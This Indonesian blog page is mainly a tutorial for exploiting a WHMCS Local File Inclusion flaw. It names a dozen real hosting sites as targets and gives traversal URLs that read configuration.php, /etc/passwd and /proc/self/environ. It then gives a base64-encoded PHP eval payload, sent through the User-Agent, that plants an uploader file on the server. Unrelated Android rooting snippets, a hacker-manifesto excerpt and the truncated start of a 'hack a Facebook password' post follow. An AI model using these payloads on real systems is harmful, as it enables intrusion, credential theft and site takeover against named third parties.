WHMCS Exploit with LFI

Ada yang tau apa itu LFI ??

kalo yg belum saya akan menjelaskan sedikit apa itu LFI .

LFI a.k.a Local File Inclusion adalah sebuah bug dimana kita bisa mengexploitnya hanya dengan melalui URL, dan memanfaatkan segala cara untuk bisa mengakses Web tersebut.

Oke langsung saja ke POCnya :

1. Biasalah cari target dengan dork, dorknya sama kaya yang submitticket hanya rubah ja nanti dengan exploitnya.

2. Misalnya saya punya target yang sudah Vuln :

http://www.hosting.joomi.co.il/cart.php

http://www.hosty.nl/cart.php

http://mijn.h5hosting.nl/cart.php

http://www.tele-asia.net/billing/cart.php

http://test.idcbest.hk/cart.php

http://client.mousenet.net/cart.php

http://hostxweb.com/client/cart.php

http://customer.leohost.net/cart.php

http://area-clienti.cambali.it/cart.php

http://billing.edom.hu/cart.php

http://xtremehost.herobo.com/cart.php

http://www.nethosting.freeiz.com/clientes/cart.php

Di atas kita hanya memanfaatkan memalui cart.php atau bisa juga dengan yg lain nya , yg memiliki kerentanan.

3. Kemudian masukkan exploit LFI :

cart.php?a=syndrom&templatefile=../../../configuration.php

Sehingga misalnya kita contohkan seperti ini, :

http://www.nethosting.freeiz.com/clientes/cart.php?a=syndrom&templatefile=../../../configuration.php

4. Liat Source Web tersebut dengan menekan Ctrl+u , scroll kebawah dan lihat disana ada configuration webnya :D. asikk

Bagaimana cara mengkonekan nya :/

5.Ada beberapa cara untuk mengkonekan Configuration tersebut :

- Menggunakan ftp

- Menggunakan navicat for mysql

- Filezilla

- Menggunakan armitage ( bila anda menggunakan backtrack / blackbuntu ).

Anda tidak bisa mengkonekan sembarangan dengan port default, tentunya kita harus mengetahui port yang terbuka terlebih dahulu, untuk bisa mengakses semua Filenya, ada beberapa cara juga untuk mengecek portnya, diantaranya bisa menggunakan nmap bisa juga memakai port scanner yg ada di shell :D.

Ada Cara kedua selain mengkonekan dengan cara tersebut.

Caranya dengan menggunakan tamper data.

1. Install Dulu addons tamper data yg ada di mozilla

2. Setelah di install , kita cek /etc/passwdnya :

http://www.nethosting.freeiz.com/clientes/cart.php?a=syndrom&templatefile=../../../../../../../../../../../../../../../../etc/passwd

Kalo muncul , otomatis /proc/self/environ nya pun muncul, kita lihat muncul tidak :

http://www.nethosting.freeiz.com/clientes/cart.php?a=syndrom&templatefile=../../../../../../../proc/self/environ

3. Kemudian buka tamper lalu refresh , Klik tamper.. jangan Submit ataupun Cancel pastinya ;)

Disitu ada kolom User Agent, hapus tulisan yang Mozilla blablabla lalu ganti dengan :

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigiZG93bmxvYWRzL2luZGV4eC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTs=')) ;{/php})

Lalu ok, setelah proses tamper selsai, lalu kita cek apakah muncul tempat upload ??

http://www.nethosting.freeiz.com/clientes/downloads/indexx.php

/downloads/indexx.php << adalah path yang ada di exploit tersebut. ;)

Oleh Ｓｙ Ｎｄ Ｒｏｍ di Typicore XecureIT ( TX-IT )

Custom ROM Galaxy Ace

CM7 Official

http://rathalos-killer.blogspot.com/2012/03/official-cyanogen-mod-7-galaxy-ace.html

GingerReal ROM ( Tanpa CWM )

http://rathalos-killer.blogspot.com/2012/02/ginger-real-rom-galaxy-ace.html

Black Hawk ROM Galaxy Ace

http://rathalos-killer.blogspot.com/2012/02/black-hawk-rom-galaxy-ace.html

CM79 ROM Galaxy Ace

http://rathalos-killer.blogspot.com/2012/06/cm79-rom-galaxy-ace.html

Setting auto-text supaya ga kotak-kotak !!

Baik, ada syaratnya dulu:

Mesti di ROOT

Udah terpasang aplikasi ROOT EXPLORER (kita sebut rotex yah biar gampang) bisa nyari di dokumen kumpulan aplikasi. Dapat dicari di approb: http://approb.com/android-apps/436.html

Baik ini sesajennya:

Droidsansfallback.ttf (hasil editan Abah) : http://dl.dropbox.com/u/62375291/DroidSansFallback.ttf 

STOCKROM DXKT6 ( Mod Theme ) GALAXY MINI

• Langsung saja ya .. :p

  
  

  Feature :

  
  

  • - Lidroid 14 Toggle Power Button
  • - BatteryBar
  • - Adder Tool Box Untuk setting 14 Toggle,
  • BatteryBar dan lain-lain di menu setting

  
  

  SCREENSHOOT NYA :D

Recovery Mode Beberapa Android

Untuk masuk ke recovery mode, semuanya dilakukan dari kondisi handphone mati (off)

ACER

Cara masuk recovery mode Acer BeTouch E210:

Tekan Tombol Volume Down + Camera + Power Secara bersamaan > Ikuti petunjuk yang ada di layar.

Cara masuk recovery mode Acer Liquid Metal:

Caranya sama seperti Acer BeTouch E210

Cara Mudah Memindahkan Aplikasi Android ke SD Card Tanpa Root

Tested. Do with your own risk! — Tapi harusnya sih baik-baik saja, hehe..

Secara default, Android tidak mengizinkan pengguna untuk memindahkan aplikasi yang terinstall di phone memory ke memory eksternal / SD Card. Dengan jumlah phone memory yang terbatas, dan banyaknya aplikasi yang terinstall di phone memory akan membuatnya semakin penuh. Nah anda ingin memindahkan aplikasi tersebut ke SD Card?

Di sini saya akan menjelaskan bagaimana cara untuk meng-enable fitur Move to SD Card dari Android anda. Cara ini sangat aman, dan hampir tidak mungkin membuat Android anda hang/bricked.

Inilah Cara Mudah Memindahkan Aplikasi Android ke SD Card Tanpa Root :

Caranya:

Unroot Samsung Galaxy Mini GT-S5570i

Unroot Samsung Galaxy Mini GT-S5570i

Unroot berarti kita mengembalikan hak akses HH Android kita ke aslinya, jika kamu akan meng-unroot HH Android kamu berarti kamu sudah men-root sebelumnya.Jika kamu meng-unroot HH Android kita akan mengunci pengguna sepenuhnya dalam android kamu, misalnya saja kita menginstal ROM maka kita harus membuka kunci dari Android tersebut dengan Meng-root nya. 

Berikut cara untuk Unroot Samsung Galaxy Mini GT-S5570i :

Rooting Android di Xperia X10 Mini

1. Download www.mediafire.com/file/73e29s1dwp3fdhu/exploid_x10mini.zip

1.1. Extract isi file ZIP C:\exploid_x10mini

2. Download Android SDK www.developer.android.com/sdk/index.html (Sesuai dengan OS yang digunakan)

2.1. Extract ZIP File

2.2. browse android-sdk-windows\tools\ dan kopikan seluruh file di dalam folder ini ke C:\exploid_x10mini

Setting Modem EVDO Rev. A SMARTFREN AC682 di Linux Ubuntu 11.10

Untuk setting Modem EVDO Rev. A SMARTFREN AC682 di Linux Ubuntu 11.10 ada sedikit perbedaan dengan menyetting di Ubuntu versi sebelum 11.10, dimana di Linux Ubuntu 11.10 ada tambahan file yaitu libssl yang perlu diinstall. Selengkapnya akan dijelaskan di tutorial berikut ini.

‘The Conscience of a Hacker’ (Hati Nurani Seorang Hacker)

Berikut cuplikan dokumen yang kerap disebut ‘Manifesto Hacker’itu: "Inilah dunia kami…dunia electron dan switch,beauty of the baud.Kalian menyebut kamipenjahat..karena kami menggunakan layanan yang sudah ada tanpa membayar,padahallayanan itu seharusnya sangat murah jika tidak dikuasai olej orang-orang rakus.Kami

Mau JADI Hacker.???

Jadi kamu memutuskan untuk menjadi seorang hacker tapi kami nggak tau gimana mulainya?

Sebelum kamu benar-benar mulai, pastikan bahwa hal-hal berikut ini adalah jelas:

(Pastikan juga bahwa kamu mengerti, bahwa tidak ada satupun anggota 'dari kami' yang mengklaim

diri sebagai 'hackers'. Bagi kami yang terpenting adalah eksplorasi dan eksploitasi

WHMCS Exploit with LFI

Ada yang tau apa itu LFI ??

kalo yg belum saya akan menjelaskan sedikit apa itu LFI .

LFI a.k.a Local File Inclusion adalah sebuah bug dimana kita bisa mengexploitnya hanya dengan melalui URL, dan memanfaatkan segala cara untuk bisa mengakses Web tersebut.

Oke langsung saja ke POCnya :

Tutorial Hack Simple Account FB

Hai teman apakah anda tahu cara mengetahui password orang lain. Tak banyak yang tau kalau ternyata facebook dan yahoo menjalin sebuah kerja sama yang unik, hal ini baru saya tau beberapa waktu yang lalu dari seorang kawan yang kebetulan juga baru mendapatkan informasi ini.

Dan dengan memanfaatkan celah dari kerja sama inilah kita dapat mengetahui password dari account

facebook seseorang dengan sangat mudah.

Saya sendiri sudah mencoba beberapa cara dan selalu gagal, sudah men-download berbagai macam

software dalam usaha ini tapi tetap saja tak berhasil mendapatkan password account yang di incar.

Tapi ternyata, setelah mengetahui celah ini, saya sampai merasa bodoh sendiri. Karena ternyata sangat mudah mendapatkan password facebook seseorang jika kita tau cara yang tepat.

Dan sama sekali tidak memerlukan software..!!

Oke akan saya jelaskan caranya: